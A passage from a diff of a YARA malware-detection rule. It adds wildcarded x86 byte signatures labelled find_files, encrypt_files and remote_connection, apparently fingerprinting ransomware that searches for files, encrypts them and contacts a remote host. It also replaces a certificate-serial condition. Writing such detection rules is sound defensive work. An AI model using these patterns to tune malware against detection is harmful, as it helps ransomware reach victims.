+            9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 89 D9 8B 00 C6 44 24 ?? ?? 8B 57 ?? 89 B5 ?? ?? ??
+            ?? 89 04 24 8D 14 50 89 54 24 ?? E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 1C 24
+            E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 89 5C 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83 F8 ?? 89 C6 0F 84 ??
+            ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? F6 85 ?? ??
+            ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 0F 85 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 83 EC ?? 39 C8 74 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? C7 44 24 ??
+            ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? 89 5C 24 ?? 89 34 24 FF 15 ?? ?? ??
+            ?? 83 EC ?? 85 C0 75 ?? 89 34 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 9D ?? ?? ??
+            ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 ?? ?? 8D 76
+            ?? 8D BC 27 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 85 C0 74
+        }
+		$find_files_p3 = {
+            8B 45 ?? F6 85 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 75
+            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 EC ?? 39 D0 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 89
+            C3 8B 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8D B5 ?? ?? ?? ?? 39 F0 74 ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ??
+            ?? EB ?? 89 C3 8B 85 ?? ?? ?? ?? 39 F0 75 ?? EB ?? EB ?? EB ?? 89 C3 EB ?? C7 04 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+		$encrypt_files_p1 = {
+            55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 8B 45 ?? 89 8D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 00 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 83
+            F8 ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 C6 8D 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ??
+            89 34 24 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ??
+            89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 89 34 24 05 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 89 44 24 ?? 83 D2 ?? A1 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85
+            ?? ?? ?? ?? FF D0 31 C0 83 EC ?? 83 BD ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 AB 7C ?? 0F
+            8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24
+            ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 74 24 ?? 89 04 24 FF 15 ?? ?? ?? ??
+            83 EC ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 35 ?? ?? ?? ?? 0B 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            80 7D ?? ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8D 85 ?? ??
+            ?? ?? 89 D9 89 04 24 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ??
+            ?? ?? 83 EC ?? 8B B5 ?? ?? ?? ?? 89 D9 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 1E 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D
+        }
+		$encrypt_files_p2 = {
+            85 ?? ?? ?? ?? 89 04 24 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 04 24 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24
+            ?? 8B 0E E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 89 04 24 89 54
+            24 ?? 8B 0E 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
+            ?? ?? 85 FF 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 8D BD ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 8B 85
+            ?? ?? ?? ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? C7 04 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89
+            85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
+            1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 0F AC D0 ?? C1 EA ?? 89 D3 09
+            C3 0F 84 ?? ?? ?? ?? 83 C0 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 89 85 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 D2 ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            90 8D B4 26 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44
+            24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 8D ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 5C
+        }
+		$encrypt_files_p3 = {
+            24 ?? 89 0C 24 8B 0A E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B
+            9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 44 24 ?? 89 54 24 ?? 89 1C 24
+            FF 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 89 9D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 81 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 5C
+            24 ?? 89 54 24 ?? 89 04 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83
+            EC ?? 81 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 D9 83 95 ?? ?? ?? ?? ?? 8B 02 89 04 24 E8 ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 EC ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 0B 89 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0B E8 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 EC ?? 89 04 24 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? 89 44 24 ?? 8B
+            85 ?? ?? ?? ?? 89 44 24 ?? 8B 0B E8 ?? ?? ?? ?? 8B 0B 83 EC ?? E8 ?? ?? ?? ?? 8B 9D
+            ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 1C 24 FF 15 ?? ?? ?? ?? 8B
+        }
+		$encrypt_files_p4 = {
+            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C 24 ?? 89 1C
+            24 89 44 24 ?? 89 54 24 ?? FF 95 ?? ?? ?? ?? 83 EC ?? 83 85 ?? ?? ?? ?? ?? 8B 9D ??
+            ?? ?? ?? 83 95 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            31 CB 31 D0 89 DA 09 C2 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 8B 95
+            ?? ?? ?? ?? 1B 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? 89 4C 24 ?? 8B 8D ?? ?? ?? ??
+            89 C3 89 44 24 ?? 89 0C 24 FF 95 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ??
+            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 8B 95 ?? ?? ?? ?? 89 14 24 8B 08 E8 ?? ??
+            ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 7C 24 ?? 8B BD ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 8B
+            95 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 5C 24 ?? 8B 1D ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
+            ?? 89 74 24 ?? 89 54 24 ?? 89 3C 24 89 9D ?? ?? ?? ?? FF D3 8B 95 ?? ?? ?? ?? 8B 85
+            ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 83 EC ?? B9 ?? ?? ?? ?? C7 85
+        }
+		$encrypt_files_p5 = {
+            89 DF C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F AC D0 ?? C1 EA
+            ?? 01 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 11 95 ?? ?? ?? ?? 31 C0 C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? C7 44 24 ?? ??
+            ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 89 54 24 ?? E8 ?? ?? ?? ?? 8B BD ?? ?? ??
+            ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? 89 85 ?? ??
+            ?? ?? 89 7C 24 ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 31 C0 F3 AB 8B BD ?? ?? ?? ?? 89 74
+            24 ?? 8D B5 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ??
+            89 3C 24 FF 95 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83
+            EC ?? 8B 18 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ??
+            ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? 8D BD ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? 8B B5
+            ?? ?? ?? ?? 31 D2 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? F3 AB 8B BD ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 89 F9 C1 F9 ?? 83 E1 ?? 89 C8 01 F0 11 FA 0F AC D0 ?? C1 FA ?? 83
+        }
+		$encrypt_files_p6 = {
+            C0 ?? 83 D2 ?? 0F A4 C2 ?? C1 E0 ?? 89 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 89 FA 09 F2
+            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 F7 C6 00 ?? 83 C0 ?? 39 C2 75 ?? 89 BD
+            ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 D9 89 04
+            24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 18 A1 ?? ?? ?? ?? 89 44 24 ?? 8D 85
+            ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 83 C0
+            ?? 83 EC ?? 8B 56 ?? 39 D0 0F 87 ?? ?? ?? ?? 8B 7D ?? 29 C2 8D B5 ?? ?? ?? ?? 8D 9D
+            ?? ?? ?? ?? 8B 0F C6 44 24 ?? ?? 89 9D ?? ?? ?? ?? 8D 0C 41 8D 04 51 89 0C 24 89 F1
+            89 44 24 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 34 24 8D 48 ?? E8 ?? ?? ??
+            ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 39 D8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 8B BD ?? ?? ?? ??
+            8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 8B 47 ?? 89 34 24 89 44 24 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 0F C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 90 89 34 24 8B
+            0F 83 C6 ?? E8 ?? ?? ?? ?? 83 EC ?? 39 DE 75 ?? 8B BD ?? ?? ?? ?? 8B B5
+        }
+		$encrypt_files_p7 = {
+            8B 0F E8 ?? ?? ?? ?? 8B 07 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89
+            04 24 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ??
+            8B 9D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 0F 89 95 ?? ?? ?? ?? 89 95
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 8B 0F E8 ?? ?? ?? ?? 8B 0F 83 EC ?? E8 ??
+            ?? ?? ?? 8B 0F 89 F7 E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 95 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 89 34 24 8D B5 ?? ?? ?? ?? 89 44 24 ?? 8B 85 ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? FF 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
+            EC ?? 89 3C 24 C7 44 24 ?? ?? ?? ?? ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 83 EC ?? 8B 85 ?? ?? ?? ?? 85 FF 0F 85 ?? ??
+            ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 3D
+            ?? ?? ?? ?? 0F 97 C0 0F B6 C0 89 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 65 ?? B8 ?? ?? ??
+            ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 8D 65
+            ?? B8 ?? ?? ?? ?? 5B 5E 5F 5D C2 ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15
+        }
+		$encrypt_files_p8 = {
+            83 EC ?? 8D 65 ?? 31 C0 5B 5E 5F 5D C2 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+            04 24 ?? ?? ?? ?? 89 C6 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 04 24 C1 F8 ?? 89 F1 89
+            44 24 ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 89 B5 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? 89 C3 A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 85
+            ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ?? ?? ?? ?? 89
+            04 24 89 54 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B BD ??
+            ?? ?? ?? 89 95 ?? ?? ?? ?? 89 54 24 ?? 89 85 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89
+            7C 24 ?? 89 44 24 ?? 89 34 24 FF 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 EC ?? 89 5C 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? 83 C3 ?? C7 44 24 ?? ?? ?? ?? ?? 89 34 24 89 44 24 ?? FF
+            95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 EC ?? 39 C3 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 76 ?? 81 BD ?? ??
+            ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 89 54 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 89 C6 C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 34 24 E8 ??
+            ?? ?? ?? 89 C3 8B 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB
+          }
+		$remote_connection_p1 = {
+            55 57 56 53 81 EC ?? ?? ?? ?? 8B 1A 39 18 0F 84 ?? ?? ?? ?? 89 54 24 ?? 89 C6 8D 5C
+            24 ?? F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 DF 8B 56 ?? 89 54 24
+            ?? 8B 56 ?? 89 54 24 ?? 8B 56 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89
+            3C 24 E8 ?? ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 BA ?? ?? ?? ?? 89 D5
+            29 C5 F6 05 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 06 89 44 24 ?? 8B 46 ?? 89 44 24 ??
+            C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ?? ?? ?? ?? 89 5C 24 ?? 8B 7C 24 ??
+            8B 07 89 04 24 E8 ?? ?? ?? ?? FF 47 ?? 8B 46 ?? 01 47 ?? 8B 6E ?? 85 ED 0F 84 ?? ??
+            ?? ?? 89 6C 24 ?? 8D 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
+            ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 85 C0 74 ?? C6 03 ?? A8 ?? 0F 85 ??
+            ?? ?? ?? 8B 7D ?? 8B 75 ?? 89 2C 24 E8 ?? ?? ?? ?? 89 7C 24 ?? 89 74 24 ?? 89 44 24
+            ?? C7 44 24 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 8B 74 24 ?? 29 F0 89 44 24 ?? 8D 04 33 89
+            04 24 E8 ?? ?? ?? ?? 89 DF 8B 17 83 C7 ?? 8D 82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ??
+            ?? 74 ?? A9 ?? ?? ?? ?? 75 ?? C1 E8 ?? 83 C7 ?? 88 C1 00 C1 83 DF ?? 29 DF 8B 75
+        }
+		$remote_connection_p2 = {
+            89 34 24 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 29 F9 39 C1 0F 8D ?? ?? ?? ?? 8D 04 3B 83 F9
+            ?? 0F 83 ?? ?? ?? ?? 85 C9 74 ?? 8A 16 88 10 F6 C1 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ??
+            ?? B8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? 01 D8 89 04 24 E8 ?? ?? ?? ??
+            89 5C 24 ?? 8B 44 24 ?? 8B 00 89 04 24 E8 ?? ?? ?? ?? 8B 6D ?? 85 ED 74 ?? 8D 44 24
+            ?? 89 44 24 ?? 89 2C 24 E8 ?? ?? ?? ?? 85 C0 75 ?? FF 44 24 ?? 8B 44 24 ?? 83 F8 ??
+            0F 82 ?? ?? ?? ?? C7 44 03 ?? ?? ?? ?? ?? 8D 48 ?? C1 E9 ?? 89 DF B8 ?? ?? ?? ?? F3
+            AB E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3 90 8D 74 26 ??
+            8D 40 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 10 89 54 24 ?? 8B 50 ?? 89 54 24 ?? 8B 40 ?? 89
+            44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89
+            DA 8B 0A 83 C2 ?? 8D 81 ?? ?? ?? ?? F7 D1 21 C8 25 ?? ?? ?? ?? 74 ?? A9
+        }
+		$remote_connection_p3 = {
+            75 ?? C1 E8 ?? 83 C2 ?? 88 C1 00 C1 83 DA ?? 29 DA 8D 3C 13 B8 ?? ?? ?? ?? 29 D0 E9
+            ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 8D BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 29 F8 89 44 24 ?? 89
+            74 24 ?? 01 DF 89 3C 24 E8 ?? ?? ?? ?? 89 D8 8B 08 83 C0 ?? 8D 91 ?? ?? ?? ?? F7 D1
+            21 CA 81 E2 ?? ?? ?? ?? 74 ?? F7 C2 ?? ?? ?? ?? 75 ?? C1 EA ?? 83 C0 ?? 88 D1 00 D1
+            83 D8 ?? 29 D8 BA ?? ?? ?? ?? 29 C2 E9 ?? ?? ?? ?? 8D 74 26 ?? 8D BC 27 ?? ?? ?? ??
+            8B 16 89 10 8B 54 0E ?? 89 54 08 ?? 8D 78 ?? 83 E7 ?? 29 F8 29 C6 01 C1 C1 E9 ?? F3
+            A5 E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 89 54 24 ?? 8D 46 ?? 89
+            04 24 E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 6C 24 ?? 89 3C 24 E8 ??
+            ?? ?? ?? 89 3C 24 E8 ?? ?? ?? ?? 01 C7 89 F8 29 D8 8B 54 24 ?? 29 C2 89 D5 E9 ?? ??
+            ?? ?? 8D B4 26 ?? ?? ?? ?? 8D BC 27 ?? ?? ?? ?? 8B 44 24 ?? 66 C7 44 03 ?? ?? ?? E9
+            ?? ?? ?? ?? 66 8B 54 0E ?? 66 89 54 08 ?? E9 ?? ?? ?? ?? 90 8B 54 24 ?? 8B 44 24 ??
+            E9
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "global trustee" and ( pe.signatures [ i ] . serial == "00:d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" or pe.signatures [ i ] . serial == "d8:f3:5f:4e:b7:87:2b:2d:ab:06:92:e3:15:38:2f:b0" ) and 1300060800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( all of ( $remote_connection_p* ) )
 }
-
